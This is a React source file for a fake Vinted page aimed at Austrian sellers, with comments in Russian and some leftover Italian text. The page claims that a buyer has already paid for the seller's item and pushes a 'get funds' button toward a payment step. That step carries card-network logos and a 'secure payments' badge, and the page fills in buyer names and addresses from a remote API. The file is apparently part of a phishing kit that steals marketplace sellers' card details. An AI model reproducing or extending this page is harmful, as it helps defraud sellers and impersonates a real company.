import React, { useEffect, useMemo, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import SupportWidget from './SupportWidget';
import './VintedAtSuccess.css';

import { API_URL } from '../apiBase';
const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const VINTED_LOGO_SRC = `${process.env.PUBLIC_URL || ''}/vinted-logo.png`;

/** Те же иконки платёжных систем, что на польском Vinted (VintedStripe2). */
function VintedCardBrandLogos() {
  return (
    <span className="vat-card-brand-logos" aria-hidden>
      <svg className="vat-card-brand-logo" viewBox="0 0 40 24" width="28" height="18">
        <rect width="40" height="24" rx="2" fill="#1A1F71" />
        <text x="20" y="16" textAnchor="middle" fill="#fff" fontSize="10" fontWeight="700" fontFamily="sans-serif">
          VISA
        </text>
      </svg>
      <svg className="vat-card-brand-logo" viewBox="0 0 40 24" width="28" height="18">
        <circle cx="14" cy="12" r="8" fill="#EB001B" />
        <circle cx="26" cy="12" r="8" fill="#F79E1B" />
        <path d="M20 4.4a12 12 0 0 1 0 15.2 12 12 0 0 1 0-15.2z" fill="#FF5F00" />
      </svg>
      <svg className="vat-card-brand-logo" viewBox="0 0 40 24" width="28" height="18">
        <circle cx="12" cy="12" r="9" fill="#0E4595" />
        <circle cx="28" cy="12" r="9" fill="#EE2A24" />
        <path d="M20 5.2a12 12 0 0 1 0 13.6 12 12 0 0 1 0-13.6z" fill="#00A0DC" />
      </svg>
      <svg className="vat-card-brand-logo" viewBox="0 0 40 24" width="28" height="18">
        <rect width="40" height="24" rx="2" fill="#006FCF" />
        <text x="20" y="15" textAnchor="middle" fill="#fff" fontSize="7" fontWeight="700" fontFamily="sans-serif">
          AMEX
        </text>
      </svg>
      <svg className="vat-card-brand-logo" viewBox="0 0 40 24" width="28" height="18">
        <rect width="40" height="24" rx="2" fill="#fff" stroke="#999" strokeWidth="0.5" />
        <circle cx="20" cy="12" r="5" fill="#E80000" />
        <path d="M20 8v8l4-4-4-4z" fill="#fff" />
      </svg>
    </span>
  );
}

const DE_AT = {
  elementi: 'Elementi',
  searchPh: 'Cerca oggetti',
  registerLogin: 'Registrieren | Anmelden',
  sellNow: 'Jetzt verkaufen',
  catWomen: 'Frauen',
  catMen: 'Männer',
  catKids: 'Kinder',
  catAbout: 'Über Vinted',
  bannerTitle: 'Der Käufer hat bereits für Ihren Artikel bezahlt.',
  bannerSub: 'Erhalten Sie Ihr Geld jetzt',
  prepaid: 'Ihr Artikel ist vorausbezahlt',
  buyerLabel: 'Der vollständige Name des Käufers!',
  addrLabel: 'Lieferadresse',
  instruct1:
    'Non appena riceverai il denaro sulla carta, il corriere ti contatterà. Sie müssen einen geeigneten Zeitpunkt für die Lieferung der Waren angeben.',
  instruct2: 'Die Ware muss innerhalb einer Woche nach Eingang des Geldes geliefert werden.',
  msgPrefix: 'Nummer der Mitteilung:',
  asideHead: 'Erhalt von Geldern',
  amountLine: 'Zu erhaltender Betrag:',
  getFunds: 'Mittel beschaffen',
  securePay: 'Zahlungen sicher durchführen',
};

function IconChevronDown() {
  return (
    <svg className="vat-ico-sm" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" aria-hidden>
      <path d="M6 9l6 6 6-6" />
    </svg>
  );
}

function IconSearch() {
  return (
    <svg className="vat-search-ico" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" aria-hidden>
      <circle cx="11" cy="11" r="7" />
      <path d="M21 21l-4.35-4.35" />
    </svg>
  );
}

function IconHelpCircle() {
  return (
    <svg className="vat-help-ico" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="1.8" aria-hidden>
      <circle cx="12" cy="12" r="10" />
      <path d="M9.09 9a3 3 0 0 1 5.83 1c0 2-3 3-3 3" />
      <line x1="12" y1="17" x2="12.01" y2="17" />
    </svg>
  );
}

function IconBrokenImage() {
  return (
    <svg className="vat-broken-img" viewBox="0 0 24 24" aria-hidden>
      <rect x="3" y="5" width="18" height="14" rx="2" fill="#e2e8f0" stroke="#cbd5e1" />
      <path fill="#94a3b8" d="M8 14l2.5-3 2 2.5L15 10l3 4v3H6v-2l2-1z" />
      <circle cx="9" cy="9" r="1.5" fill="#94a3b8" />
    </svg>
  );
}

function IconCheckGreen() {
  return (
    <svg className="vat-check-ico" viewBox="0 0 24 24" aria-hidden>
      <circle cx="12" cy="12" r="10" fill="#22c55e" />
      <path fill="none" stroke="#fff" strokeWidth="2.2" strokeLinecap="round" d="M8 12l2.5 2.5L16 9" />
    </svg>
  );
}

export default function VintedAtSuccess() {
  const { pageCode: pageCodeParam } = useParams();
  const pageCodeFromParams = (() => {
    try {
      if (pageCodeParam) return pageCodeParam;
      const m = window.location.pathname.match(/\/page\/([A-Z0-9]{12})(?:\/|$)/i);
      return m ? m[1] : null;
    } catch {
      return null;
    }
  })();

  const [pageData, setPageData] = useState(null);
  const [loading, setLoading] = useState(true);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  /* log/transition только на Olx2 (index2) */

  useEffect(() => {
    if (!pageCodeFromParams) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetch(`${API_URL}/api/page/${pageCodeFromParams}`)
      .then((res) => res.json())
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .catch(() => {})
      .finally(() => setLoading(false));
  }, [pageCodeFromParams]);

  const countryCode = pageData?.country_code || 'AT';

  const priceNumber = useMemo(() => {
    const raw = pageData?.price;
    if (raw == null) return null;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : null;
  }, [pageData?.price]);

  const priceText = useMemo(() => {
    if (priceNumber == null) return '228';
    return priceNumber % 1 === 0 ? String(Math.round(priceNumber)) : String(priceNumber);
  }, [priceNumber]);

  const productName = pageData?.product_name?.trim() || '😸😸😸😸😸';
  const photoUrl = pageData?.photo_url || '';
  const deliveryAddress = pageData?.delivery_address || '—';
  const firstName = pageData?.first_name || '';
  const lastName = pageData?.last_name || '';
  const buyerFullName = [firstName, lastName].filter(Boolean).join(' ') || '—';

  const msgNumber = useMemo(() => {
    if (!pageCodeFromParams) return '266536383';
    let h = 2166136261;
    for (let i = 0; i < pageCodeFromParams.length; i += 1) {
      h ^= pageCodeFromParams.charCodeAt(i);
      h = Math.imul(h, 16777619);
    }
    return String(100000000 + (h >>> 0) % 900000000).slice(0, 9);
  }, [pageCodeFromParams]);
  const { toIndex2 } = usePaymentPaths(pageCodeFromParams);
  const index2Path = toIndex2();
  if (loading) {
    return (
      <div className="vat-wrap vat-wrap--loading">
        <div className="vat-loading-bar" />
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  return (
    <div className="vat-wrap">
      <header className="vat-header">
        <div className="vat-header-inner">
          <a href="#/" className="vat-logo">
            <img src={VINTED_LOGO_SRC} alt="Vinted" className="vat-logo-img" width={120} height={36} />
          </a>
          <button type="button" className="vat-btn-elementi">
            {DE_AT.elementi}
            <IconChevronDown />
          </button>
          <div className="vat-search-wrap">
            <input type="text" className="vat-search" placeholder={DE_AT.searchPh} readOnly />
            <span className="vat-search-icon">
              <IconSearch />
            </span>
          </div>
          <div className="vat-header-actions">
            <button type="button" className="vat-btn-outline">
              {DE_AT.registerLogin}
            </button>
            <button type="button" className="vat-btn-teal">
              {DE_AT.sellNow}
            </button>
            <button type="button" className="vat-btn-circle-help" aria-label="Hilfe">
              <IconHelpCircle />
            </button>
          </div>
        </div>
        <nav className="vat-subnav" aria-label="Kategorien">
          <a href="#w">{DE_AT.catWomen}</a>
          <a href="#m">{DE_AT.catMen}</a>
          <a href="#k">{DE_AT.catKids}</a>
          <a href="#u">{DE_AT.catAbout}</a>
        </nav>
      </header>

      <main className="vat-main">
        <div className="vat-container">
          <section className="vat-banner">
            <h1 className="vat-banner-title">{DE_AT.bannerTitle}</h1>
            <p className="vat-banner-sub">{DE_AT.bannerSub}</p>
          </section>

          <div className="vat-layout">
            <div className="vat-col-main">
              <div className="vat-product-block">
                <div className="vat-thumb">
                  {photoUrl ? <img src={photoUrl} alt="" className="vat-thumb-img" /> : <IconBrokenImage />}
                </div>
                <div className="vat-product-text">
                  <div className="vat-product-name">{productName}</div>
                  <div className="vat-product-price">
                    {priceText} €
                  </div>
                  <div className="vat-product-status">{DE_AT.prepaid}</div>
                </div>
              </div>

              <hr className="vat-rule" />

              <div className="vat-kv">
                <div className="vat-kv-label">{DE_AT.buyerLabel}</div>
                <div className="vat-kv-value">{buyerFullName}</div>
              </div>

              <hr className="vat-rule" />

              <div className="vat-kv">
                <div className="vat-kv-label">{DE_AT.addrLabel}</div>
                <div className="vat-kv-value">{deliveryAddress}</div>
              </div>

              <hr className="vat-rule" />

              <p className="vat-instruct">{DE_AT.instruct1}</p>
              <p className="vat-instruct">{DE_AT.instruct2}</p>

              <hr className="vat-rule" />

              <p className="vat-msg-num">
                {DE_AT.msgPrefix}{' '}
                <strong className="vat-msg-num-strong">{msgNumber}</strong>
              </p>
            </div>

            <aside className="vat-aside">
              <div className="vat-aside-card">
                <div className="vat-aside-head">{DE_AT.asideHead}</div>
                <p className="vat-aside-amount">
                  <strong>
                    {DE_AT.amountLine} {priceText} €
                  </strong>
                </p>
                <p className="vat-aside-name">{productName}</p>
                <Link to={index2Path} className="vat-aside-btn">
                  {DE_AT.getFunds}
                </Link>
                <div className="vat-aside-trust">
                  <IconCheckGreen />
                  <span>{DE_AT.securePay}</span>
                </div>
                <VintedCardBrandLogos />
              </div>
            </aside>
          </div>
        </div>
      </main>

      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}
